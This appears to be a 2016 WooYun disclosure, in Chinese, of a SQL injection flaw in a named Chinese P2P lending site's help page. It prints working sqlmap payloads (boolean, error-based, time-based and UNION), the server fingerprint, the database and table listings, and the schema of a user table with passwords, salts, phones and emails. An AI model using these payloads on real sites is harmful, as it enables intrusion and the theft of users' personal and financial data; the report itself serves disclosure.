当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166406

漏洞标题:P2P金融助商贷存在sql注入漏洞(泄露用户数据)

相关厂商:助商贷

漏洞作者: Nelion

提交时间:2016-01-01 23:56

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-01: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-02-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

P2P金融助商贷存在sql注入漏洞(泄露用户数据)。root权限,泄露用户数据。

详细说明:

助商贷是四川宇登投资咨询有限公司旗下一个安全、高效、专业、规范的互联网P2P网络借贷服务平台,平台业务突破地域的限制,手续简单,投资门槛低,高效安全,既有效的帮助了中小微企业解决融资难等问题,又让有闲散资金的投资人实现了财富保值增值。(官网介绍)
1、注入点:

http://www.scyd360.com/help.php?mod=list&cateid=4


<code>sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cateid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mod=list&cateid=4 AND 5202=5202
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: mod=list&cateid=4 AND (SELECT 3295 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (EL
T(3295=3295,1))),0x71766b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a
)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: mod=list&cateid=4 AND (SELECT * FROM (SELECT(SLEEP(5)))ZnXj)
Type: UNION query
Title: Generic UNION query (NULL) - 19 columns
Payload: mod=list&cateid=4 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a766b71,0x
465a4c7a58596e6e5a46,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[14:42:11] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[14:42:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, PHP 5.2.17
back-end DBMS: MySQL 5.0

漏洞证明:

2、当前用户及权限:

用户及权限.png


3、所有数据库:

available databases [4]:
[*] information_schema
[*] mysql
[*] scyd
[*] test


4、当前库是scyd,看一下其中的表及数据量:

Database: scyd
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| scyd_caiwu_mingxi                 | 94713   |
| scyd_emali_list                   | 82905   |
| pre_common_district               | 45051   |
| scyd_rcharge                      | 24993   |
| scyd_earnings_clear               | 24321   |
| scyd_log                          | 19235   |
| scyd_order                        | 17047   |
| scyd_emali_setting                | 14785   |
| scyd_product_img                  | 8654    |
| scyd_jlset                        | 7241    |
| scyd_record                       | 3227    |
| scyd_personal_account             | 2959    |
| scyd_user                         | 2959    |
| scyd_user_security                | 2959    |
| scyd_kqer_tc                      | 2927    |
| scyd_reward_details               | 2761    |
| scyd_repayment_records            | 2140    |
| scyd_rongzhi_num                  | 1813    |
| scyd_bank                         | 1523    |
| pre_common_member_count           | 1171    |
| pre_common_member_field_forum     | 1171    |
| pre_common_member_field_home      | 1171    |
| pre_common_member_profile         | 1171    |
| pre_common_member_status          | 1171    |
| pre_ucenter_memberfields          | 1171    |
| pre_ucenter_members               | 1171    |
| pre_common_member                 | 1170    |
| scyd_product                      | 987     |
| scyd_product_user_info            | 987     |
| scyd_info                         | 651     |
| pre_common_setting                | 421     |
| pre_forum_statlog                 | 349     |
| scyd_reward_dolist                | 349     |
| pre_common_credit_rule_log        | 312     |
| scyd_ylxq                         | 210     |
| scyd_auto_buy                     | 181     |
| scyd_daysnum                      | 174     |
| scyd_rongzhi                      | 138     |
| pre_common_syscache               | 106     |
| mall_orders                       | 104     |
| pre_common_block_style            | 103     |
| mz_jigou_ren                      | 92      |
| scyd_nav                          | 83      |
| scyd_record05                     | 82      |
| pre_common_smiley                 | 75      |
| pre_common_admincp_perm           | 67      |
| pre_common_nav                    | 55      |
| pre_common_member_profile_setting | 51      |
| pre_common_stylevar               | 45      |
| scyd_email_code                   | 45      |
| pre_forum_forumfield              | 41      |
| pre_forum_forum                   | 40      |
| mall_items                        | 35      |
| pre_common_stat                   | 33      |
| pre_common_credit_rule            | 31      |
| pre_ucenter_settings              | 27      |
| pre_common_onlinetime             | 25      |
| pre_common_cron                   | 20      |
| pre_common_usergroup              | 20      |
| pre_common_usergroup_field        | 20      |
| scyd_inter_money                  | 18      |
| pre_home_click                    | 15      |
| scyd_infocate                     | 15      |
| scyd_job                          | 13      |
| pre_common_plugin                 | 12      |
| scyd_tag                          | 11      |
| pre_forum_medal                   | 10      |
| pre_common_session                | 9       |
| scyd_admin                        | 9       |
| scyd_productcate                  | 8       |
| pre_common_admingroup             | 7       |
| scyd_activity                     | 7       |
| scyd_authgroup                    | 7       |
| scyd_delimitlabel                 | 7       |
| pre_forum_typeoption              | 6       |
| scyd_activity_details             | 6       |
| pre_common_admincp_group          | 5       |
| pre_common_friendlink             | 5       |
| pre_home_notification             | 5       |
| scyd_equity_details               | 5       |
| scyd_loan_application             | 5       |
| pre_forum_bbcode                  | 4       |
| pre_forum_onlinelist              | 4       |
| scyd_jobcate                      | 4       |
| scyd_onlinechat                   | 4       |
| scyd_usergroup                    | 4       |
| pre_common_diy_data               | 3       |
| pre_common_member_newprompt       | 3       |
| pre_forum_grouplevel              | 3       |
| pre_forum_imagetype               | 3       |
| scyd_adszone                      | 3       |
| pre_common_block                  | 2       |
| pre_common_template_block         | 2       |
| pre_common_word_type              | 2       |
| pre_forum_access                  | 2       |
| pre_mobile_setting                | 2       |
| pre_ucenter_applications          | 2       |
| pre_ucenter_failedlogins          | 2       |
| pre_ucenter_pm_members            | 2       |
| pre_common_admincp_member         | 1       |
| pre_common_admincp_session        | 1       |
| pre_common_credit_rule_log_field  | 1       |
| pre_common_failedip               | 1       |
| pre_common_statuser               | 1       |
| pre_common_style                  | 1       |
| pre_common_template               | 1       |
| pre_forum_threadprofile           | 1       |
| pre_home_visitor                  | 1       |
| pre_portal_category               | 1       |
| pre_ucenter_admins                | 1       |
| pre_ucenter_notelist              | 1       |
| pre_ucenter_pm_indexes            | 1       |
| pre_ucenter_pm_lists              | 1       |
| pre_ucenter_pm_messages_1         | 1       |
| scyd_config                       | 1       |
| scyd_page                         | 1       |
| scyd_pagecate                     | 1       |
| scyd_skin                         | 1       |
| scyd_test                         | 1       |
+-----------------------------------+---------+


5、看一下用户表scyd_user,中的某些字段:

Database: scyd
Table: scyd_user
[33 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| address       | varchar(200) |
| brothday      | varchar(10)  |
| comp_scale    | varchar(32)  |
| education     | varchar(32)  |
| email         | varchar(200) |
| explam        | text         |
| flag          | smallint(2)  |
| forgetpwd     | varchar(200) |
| ftgcode       | varchar(10)  |
| headimg       | varchar(200) |
| helpqq        | varchar(20)  |
| im            | varchar(200) |
| induatry      | varchar(32)  |
| job           | varchar(32)  |
| lastlogindate | int(11)      |
| lastloginip   | varchar(100) |
| loginname     | varchar(30)  |
| marriage      | varchar(10)  |
| memo          | text         |
| password      | varchar(64)  |
| pointnum      | int(11)      |
| postnums      | int(11)      |
| realname      | varchar(30)  |
| regcode       | varchar(64)  |
| regdate       | int(11)      |
| salary        | varchar(32)  |
| salt          | varchar(32)  |
| sex           | int(11)      |
| stopdate      | int(11)      |
| telno         | varchar(100) |
| tgcode        | varchar(10)  |
| usergroupid   | int(11)      |
| userid        | int(11)      |
+---------------+--------------+


6、看telno,email,loginnamek,password这几个字段的数据一部分:

用户数据.png

修复方案:

参数过滤

版权声明:转载请注明来源 Nelion@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝